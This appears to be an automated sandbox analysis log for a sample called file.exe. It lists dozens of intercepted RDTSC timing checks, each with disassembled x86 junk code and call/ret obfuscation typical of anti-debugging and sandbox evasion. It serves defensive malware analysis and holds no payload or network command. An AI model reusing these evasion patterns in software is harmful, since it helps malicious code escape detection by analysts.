Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0C6AC second address: D0C6BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515DAh 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0F99D second address: D0F9A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0F9A3 second address: D0F9DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jl 00007FF0BC8515EEh 0x00000013 jmp 00007FF0BC8515E8h 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jnl 00007FF0BC8515D8h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0F9DC second address: D0FA32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push edx 0x0000000b jmp 00007FF0BCB462C7h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 jmp 00007FF0BCB462C8h 0x0000001a pop eax 0x0000001b jmp 00007FF0BCB462BDh 0x00000020 push 71AA9882h 0x00000025 pushad 0x00000026 push esi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D101D1 second address: D101DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF0BC8515D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D10B3F second address: D10B43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D10B43 second address: D10B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FF0BC8515D8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 movsx esi, di 0x00000027 xchg eax, ebx 0x00000028 jmp 00007FF0BC8515DAh 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push edi 0x00000031 jmp 00007FF0BC8515E6h 0x00000036 pop edi 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D110C7 second address: D110E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF0BCB462C6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D11B44 second address: D11B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D11B48 second address: D11B4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D11B4C second address: D11B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D11B52 second address: D11B58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D11B58 second address: D11B67 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D11B67 second address: D11B71 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF0BCB462B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D12B97 second address: D12B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D12B9C second address: D12C32 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FF0BCB462BBh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FF0BCB462C9h 0x00000011 nop 0x00000012 sub dword ptr [ebp+12450062h], eax 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007FF0BCB462B8h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 add dword ptr [ebp+122D2626h], esi 0x0000003a jmp 00007FF0BCB462BDh 0x0000003f push 00000000h 0x00000041 mov esi, dword ptr [ebp+122D29CEh] 0x00000047 mov dword ptr [ebp+122D1B9Fh], edx 0x0000004d xchg eax, ebx 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 pushad 0x00000052 popad 0x00000053 jmp 00007FF0BCB462C5h 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D12C32 second address: D12C38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D12C38 second address: D12C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D12C3C second address: D12C4E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF0BC8515D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D12C4E second address: D12C52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D135BC second address: D135C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D135C0 second address: D135CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1411E second address: D14128 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF0BC8515D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D13EF6 second address: D13EFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D14128 second address: D14146 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF0BC8515DAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D15F8F second address: D16007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b jno 00007FF0BCB462B6h 0x00000011 pop eax 0x00000012 pushad 0x00000013 jp 00007FF0BCB462B6h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b popad 0x0000001c popad 0x0000001d nop 0x0000001e jmp 00007FF0BCB462BBh 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007FF0BCB462B8h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 00000017h 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f mov si, 3000h 0x00000043 mov edi, dword ptr [ebp+122D1BD6h] 0x00000049 push 00000000h 0x0000004b mov edi, dword ptr [ebp+122D2BD2h] 0x00000051 xchg eax, ebx 0x00000052 jmp 00007FF0BCB462C2h 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b pushad 0x0000005c popad 0x0000005d push esi 0x0000005e pop esi 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1B286 second address: D1B30E instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF0BC8515DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnl 00007FF0BC8515E4h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007FF0BC8515D8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c push 00000000h 0x0000002e jmp 00007FF0BC8515E4h 0x00000033 push 00000000h 0x00000035 jng 00007FF0BC8515DEh 0x0000003b jns 00007FF0BC8515D8h 0x00000041 xchg eax, esi 0x00000042 push ebx 0x00000043 jmp 00007FF0BC8515DDh 0x00000048 pop ebx 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d jbe 00007FF0BC8515D6h 0x00000053 push edi 0x00000054 pop edi 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1D1EA second address: D1D22E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BCB462C0h 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d call 00007FF0BCB462BBh 0x00000012 sub bx, E0F9h 0x00000017 pop edi 0x00000018 push 00000000h 0x0000001a mov bh, ah 0x0000001c push 00000000h 0x0000001e mov edi, dword ptr [ebp+1247C443h] 0x00000024 sbb edi, 6370CED0h 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e push eax 0x0000002f pop eax 0x00000030 push ecx 0x00000031 pop ecx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D168B3 second address: D168B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1A434 second address: D1A439 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D193C7 second address: D193D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF0BC8515D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1B4BB second address: D1B4C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FF0BCB462BCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1C4D0 second address: D1C574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jmp 00007FF0BC8515E4h 0x0000000c popad 0x0000000d push eax 0x0000000e push ecx 0x0000000f jmp 00007FF0BC8515E7h 0x00000014 pop ecx 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007FF0BC8515D8h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 push ebx 0x00000031 mov dword ptr [ebp+122D1B9Fh], edi 0x00000037 pop ebx 0x00000038 push dword ptr fs:[00000000h] 0x0000003f xor edi, dword ptr [ebp+122D5416h] 0x00000045 mov dword ptr fs:[00000000h], esp 0x0000004c or edi, 08CF1E95h 0x00000052 mov eax, dword ptr [ebp+122D13B9h] 0x00000058 mov edi, 38BD4E66h 0x0000005d push FFFFFFFFh 0x0000005f push esi 0x00000060 mov ebx, 065370BEh 0x00000065 pop ebx 0x00000066 nop 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a push edi 0x0000006b pop edi 0x0000006c jmp 00007FF0BC8515DFh 0x00000071 popad 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1F2B6 second address: D1F2F8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FF0BCB462B8h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 xor dword ptr [ebp+122D1BA9h], ebx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c and ebx, 12E9FF50h 0x00000032 xchg eax, esi 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push ecx 0x00000037 pop ecx 0x00000038 pushad 0x00000039 popad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1F2F8 second address: D1F31B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1F31B second address: D1F320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1D3D6 second address: D1D3DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1F467 second address: D1F46D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1F46D second address: D1F476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2060F second address: D20638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FF0BCB462C1h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF0BCB462BFh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D20638 second address: D2063D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D25452 second address: D25465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FF0BCB462B8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D25465 second address: D25477 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0BC8515DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D245FA second address: D24610 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF0BCB462B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c jnp 00007FF0BCB462C0h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D25725 second address: D25729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D25729 second address: D25769 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007FF0BCB462C4h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 jmp 00007FF0BCB462C4h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D26918 second address: D2691E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2691E second address: D26922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D31487 second address: D3148B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D31622 second address: D31626 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3179A second address: D317A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF0BC8515D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D37B05 second address: D37B26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FF0BCB462C0h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D37B26 second address: D37B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D37B2B second address: D37B30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D37CC0 second address: D37CC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D37CC4 second address: D37CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D37CCD second address: D37CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3FA57 second address: D3FA5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3FA5D second address: D3FA62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3FA62 second address: D3FA9F instructions: 0x00000000 rdtsc 0x00000002 je 00007FF0BCB462C4h 0x00000008 jmp 00007FF0BCB462BEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007FF0BCB462BCh 0x00000017 jmp 00007FF0BCB462C7h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3FA9F second address: D3FAA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D45676 second address: D4567F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4567F second address: D45683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D45B10 second address: D45B14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D45B14 second address: D45B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BC8515E6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FF0BC8515E8h 0x00000010 jp 00007FF0BC8515DEh 0x00000016 popad 0x00000017 push eax 0x00000018 je 00007FF0BC8515E2h 0x0000001e jns 00007FF0BC8515D6h 0x00000024 jbe 00007FF0BC8515D6h 0x0000002a push esi 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D465F1 second address: D465F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D465F5 second address: D4661A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007FF0BC8515D6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF0BC8515E1h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4AE59 second address: D4AE63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF0BCB462B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4AE63 second address: D4AE67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4A851 second address: D4A882 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C8h 0x00000007 jmp 00007FF0BCB462C5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4B545 second address: D4B556 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF0BC8515D8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4B556 second address: D4B569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4B7F7 second address: D4B7FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4BAE6 second address: D4BAEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D515BB second address: D515BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D515BF second address: D515DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jg 00007FF0BCB462B6h 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D515DE second address: D51604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FF0BC8515D6h 0x0000000e jmp 00007FF0BC8515E8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D50559 second address: D50575 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnl 00007FF0BCB462B6h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 pop eax 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007FF0BCB462B6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D50575 second address: D50579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1721C second address: D17242 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FF0BCB462B6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF0BCB462C4h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17242 second address: D17246 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17246 second address: D17254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FF0BCB462B6h 0x0000000e rdtsc
